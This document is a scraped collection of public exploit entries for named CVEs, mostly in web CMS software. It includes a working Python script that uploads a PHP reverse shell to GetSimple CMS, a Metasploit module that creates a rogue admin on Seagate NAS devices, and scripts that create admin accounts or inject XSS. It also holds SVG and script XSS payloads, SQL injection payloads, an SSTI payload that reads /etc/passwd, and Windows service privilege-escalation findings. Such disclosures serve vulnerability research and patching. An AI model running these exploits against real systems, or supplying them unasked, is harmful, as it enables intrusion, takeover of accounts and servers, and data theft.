ISHACK AI BOT

# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) # Data: 18/5/2023 # Exploit Author : Youssef Muhammad # Vendor: Get-simple # Software Link: # Version app: 3.3.16 # Tested on: linux # CVE: CVE-2022-41544 import sys import hashlib import re import requests from xml.etree import ElementTree from threading import Thread import telnetlib purple = "\033[0;35m" reset = "\033[0m" yellow = "\033[93m" blue = "\033[34m" red = "\033[0;31m" def print_the_banner(): print(purple + ''' CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4 '''+ reset) def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return None def api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return None def set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headers def get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return None def upload_shell(target, path, headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e) def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e) def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path) if __name__ == '__main__': print_the_banner() main()

# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-04-15 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.bludit.com/ # Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1 # Version: 3.14.1 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31698 SVG Payload ------------- <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> save this SVG file xss.svg Steps to Reproduce: 1. At first login your admin panel. 2. then go to settings and click the logo section. 3. Now upload xss.svg file so your request data will be POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998 Referer: http://127.0.0.1/bludit/admin/settings Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i Content-Length: 651 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="tokenCSRF" 626c201693546f472cdfc11bed0938aab8c6e480 -----------------------------15560729415644048492005010998 Content-Disposition: form-data; name="inputFile"; filename="xss.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> -----------------------------15560729415644048492005010998-- 4. Now open the logo image link that you upload. You will see XSS pop up.

# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) # Date: 2023-04-17 # Exploit Author: Rahad Chowdhury # Vendor Homepage: http://churchcrm.io/ # Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4 # Version: 4.5.4 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-31699 Steps to Reproduce: 1. At first login your admin panel. 2. Then click the "Admin" menu and click "CSV Import '' and you will get the CSV file uploader option. 3. now insert xss payload in jpg file using exiftool or from image properties and then upload the jpg file. 4. you will see XSS pop up.

# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) # Date: 2023-02-02 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://civicrm.org # Software Link: https://civicrm.org/download # Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier) # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70) # CVE: CVE-2023-25440 Vendor Security Advisory: CIVI-SA-2023-05 Description: A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name field, it will be triggered once page gets loaded. Steps to reproduce: - Quick Add contact to CiviCRM, - Insert a payload PoC inside the field(s) - Click on 'Add contact'. If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.

# Exploit Title :MobileTrans 4.0.11 - Weak Service Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://mobiletrans.wondershare.com/ # Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg # Version: MobileTrans version 4.0.11 # Tested on: Window 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31748 Vulnerability Description: MobileTrans is World 1 mobile-to-mobile file transfer application.MobileTrans version 4.0.11 was being suffered a weak service permission vulnerability that allows a normal window user to elevate to local admin. The "ElevationService" service name was installed, while the MobileTrans version 4.0.11 was installed in the window operating system. The service "ElevationService" allows the local user to elevate to the local admin as The "ElevationService" run with system privileges. Effectively, the local user is able to elevate to local admin upon successfully modifying the service or replacing the affected executable. C:\Users\HninKayThayar\Desktop>sc qc ElevationService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ElevationService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Driver Install Service help DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe" C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) # Date: 2023-05-24 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.squarepiginteractive.com # Software Link: https://www.fusioninvoice.com/store # Version: 2023-1.0 # Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50) # CVE: CVE-2023-25439 Description: A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker to execute arbitrary web scripts or HTML. Injecting persistent javascript code inside the title and/or description while creating a task/expense/project (and possibly others) it will be triggered once page gets loaded. Steps to reproduce: - Click on "Expenses", or "Tasks" and add (or edit an existing) one, - Insert a payload PoC inside a field, in example in the "Phone number" (or "Description"), - Click on 'Save'. Visiting the website dashboard, as well as the customer or project summary page, the javascript code will be executed. PoC Screenshots: https://imagebin.ca/v/7FOZfztkDs3I

# Exploit Title: Service Provider Management System v1.0 - SQL Injection # Date: 2023-05-23 # Exploit Author: Ashik Kunjumon # Vendor Homepage: https://www.sourcecodester.com/users/lewa # Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html # Version: 1.0 # Tested on: Windows/Linux 1. Description: Service Provider Management System v1.0 allows SQL Injection via ID parameter in /php-spms/?page=services/view&id=2 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit the latest vulnerabilities in the underlying database. Endpoint: /php-spms/?page=services/view&id=2 Vulnerable parameter: id (GET) 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/php-spms/?page=services/view&id=2 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql SQLMap Response: ---------------------- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://filmora.wondershare.com # Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE # Version: Filmora 12 ( Build 1.0.0.7) # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31747 Vulnerability description: Filmora is a professional video editing software. Wondershare NativePush Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The service name "NativePushService" was vulnerable to unquoted service paths vulnerability which led to full local privilege escalation in the affected window operating system as the service "NativePushService" was running with system privilege that the local user has write access to the directory where the service is located. Effectively, the local user is able to elevate to local admin upon successfully replacing the affected executable. C:\sc qc NativePushService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F HNINKAYTHAYAR\HninKayThayar:(ID)F

Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) Version: 1.6.1 Bugs: XSS Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/) 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 Host: localhost Content-Length: 976 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-platform: "Linux" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167 Connection: close ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="reqid" 187de34ea92ac ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="cmd" upload ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="target" l1_Lw ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundary5u4r3pOGl4EnuBtO Content-Disposition: form-data; name="mtime[]" 1683056102 ------WebKitFormBoundary5u4r3pOGl4EnuBtO-- 3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg) ======================================================================================================================== ###XSS-2### 1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages) 2. add page 3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E) payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E poc request: POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1 Host: localhost Content-Length: 143 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475 Connection: close page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save 4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

Exploit Title: Zenphoto 1.6 - Multiple stored XSS Application: Zenphoto-1.6 xss poc Version: 1.6 Bugs: XSS Technology: PHP Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/ Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== ###XSS-1### steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/ ===================================================== ###XSS-2### steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users) 2.change postal code as <script>alert(4)</script> 3.if admin user information import as html , xss will trigger poc video : https://youtu.be/JKdC980ZbLY

#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment #Application: Ulicms #Version: 2023.1-sniffing-vicuna #Bugs: create admin user via mass assignment #Technology: PHP #Vendor URL: https://en.ulicms.de/ #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip #Date of found: 04-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna import requests new_name=input("name: ") new_email=input("email: ") new_pass=input("password: ") url = "http://localhost/dist/admin/index.php" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" response = requests.post(url, headers=headers, data=data) if response.status_code == 200: print("Request is success and created new admin account") else: print("Request is failure.!!") #POC video : https://youtu.be/SCkRJzJ0FVk

## # Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) # Date: Dec 9 2019 # Exploit Author: Ege Balci # Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/ # Version: 2015.0916 # CVE : 2020-6627 # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'net/http' require 'net/ssh' require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Seagate Central External NAS Arbitrary User Creation", 'Description' => %q{ This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <[email protected]>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'], ['CVE', '2020-6627'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['unix'], 'Arch' => [ARCH_CMD], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find' } }, 'Targets' => [ ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ], ], 'Privileged' => true, 'DisclosureDate' => "Dec 9 2019", 'DefaultTarget' => 0 )) register_options( [ OptString.new('USER', [ true, 'Seagate Central SSH user', '']), OptString.new('PASS', [ true, 'Seagate Central SSH user password', '']) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit # First get current state first_state=get_state() if first_state print_status("Current device state: #{first_state['state']}") else return end if first_state['state'] != 'start' # Set new start state first_state['state'] = 'start' res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "info=#{first_state.to_json}" },60) changed_state=get_state() if changed_state && changed_state['state'] == 'start' print_good("State successfully changed !") else print_error("Could not change device state") return end end name = Rex::Text.rand_name_male user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}" pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8) print_status('Creating new admin user...') print_status("User: #{user}") print_status("Pass: #{pass}") # Add new admin user res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"), 'ctype' => 'application/x-www-form-urlencoded', 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1} },60) conn = do_login(user,pass) if conn print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") handler(conn.lsock) end end def do_login(user, pass) factory = ssh_socket_factory opts = { :auth_methods => ['password', 'keyboard-interactive'], :port => 22, :use_agent => false, :config => false, :password => pass, :proxy => factory, :non_interactive => true, :verify_host_key => :never } opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh = Net::SSH.start(rhost, user, opts) end rescue Rex::ConnectionError fail_with Failure::Unreachable, 'Connection failed' rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end return nil end def get_state res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"), 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } },60) if res && (res.code == 200 ||res.code == 100) return res.get_json_document end res = nil end end

#!/usr/bin/python3 # Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) # Google Dork: intitle:"SCM Manager" intext:1.60 # Date: 05-25-2023 # Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) # Vendor Homepage: https://scm-manager.org/ # Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ # Version: 1.2 <= 1.60 # Tested on: Debian based # CVE: CVE-2023-33829 # Modules import requests import argparse import sys # Main menu parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') parser.add_argument("-u", "--user", help="Admin user or user with write permissions") parser.add_argument("-p", "--password", help="password of the user") args = parser.parse_args() # Credentials user = sys.argv[2] password = sys.argv[4] # Global Variables main_url = "http://localhost:8080/scm" # Change URL if its necessary auth_url = main_url + "/api/rest/authentication/login.json" users = main_url + "/api/rest/users.json" groups = main_url + "/api/rest/groups.json" repos = main_url + "/api/rest/repositories.json" # Create a session session = requests.Session() # Credentials to send post_data={ 'username': user, # change if you have any other user with write permissions 'password': password # change if you have any other user with write permissions } r = session.post(auth_url, data=post_data) if r.status_code == 200: print("[+] Authentication successfully") else: print("[-] Failed to authenticate") sys.exit(1) new_user={ "name": "newUser", "displayName": "<img src=x onerror=alert('XSS')>", "mail": "", "password": "", "admin": False, "active": True, "type": "xml" } create_user = session.post(users, json=new_user) print("[+] User with XSS Payload created") new_group={ "name": "newGroup", "description": "<img src=x onerror=alert('XSS')>", "type": "xml" } create_group = session.post(groups, json=new_group) print("[+] Group with XSS Payload created") new_repo={ "name": "newRepo", "type": "svn", "contact": "", "description": "<img src=x onerror=alert('XSS')>", "public": False } create_repo = session.post(repos, json=new_repo) print("[+] Repository with XSS Payload created")

Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI) Exploit Author: PARAG BAGUL CVE: CVE-2023-30145 ## Description Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter. ## Affected Component All versions below 2.7.0 are affected. ## Author Parag Bagul ## Steps to Reproduce 1. Open the target URL: `https://target.com/admin/media/upload` 2. Upload any file and intercept the request. 3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`. 4. Check the response. It should return the multiplication of 77 with the message "File format not allowed (dqopi49vuuvm)". ##Detection: #Request: POST /admin/media/upload?actions=false HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/profile/edit X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688 Content-Length: 1200 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="versions" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="thumb_size" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="formats" test<%= 7*7 %>test -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="media_formats" image -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="dimension" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="private" -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="folder" / -----------------------------327175120238370517612522354688 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------327175120238370517612522354688-- #Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Cache-Control: max-age=0, private, must-revalidate Set-Cookie: cookie Content-Length: 41 File format not allowed (test49test) #Exploitation: To execute a command, add the following payload: testqopi<%= File.open('/etc/passwd').read %>fdtest Request: POST /admin/media/upload?actions=true HTTP/1.1 Host: target.com User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target.com/admin/media X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------104219633614133026962934729021 Content-Length: 1237 Origin: http://target.com DNT: 1 Connection: close Cookie: cookie -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="versions" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="thumb_size" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="formats" dqopi<%= File.open('/etc/passwd').read %>fdfdsf -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="media_formats" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="dimension" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="private" -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="folder" / -----------------------------104219633614133026962934729021 Content-Disposition: form-data; name="skip_auto_crop" true -----------------------------104219633614133026962934729021-- Response: Response: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK Set-Cookie: cookie 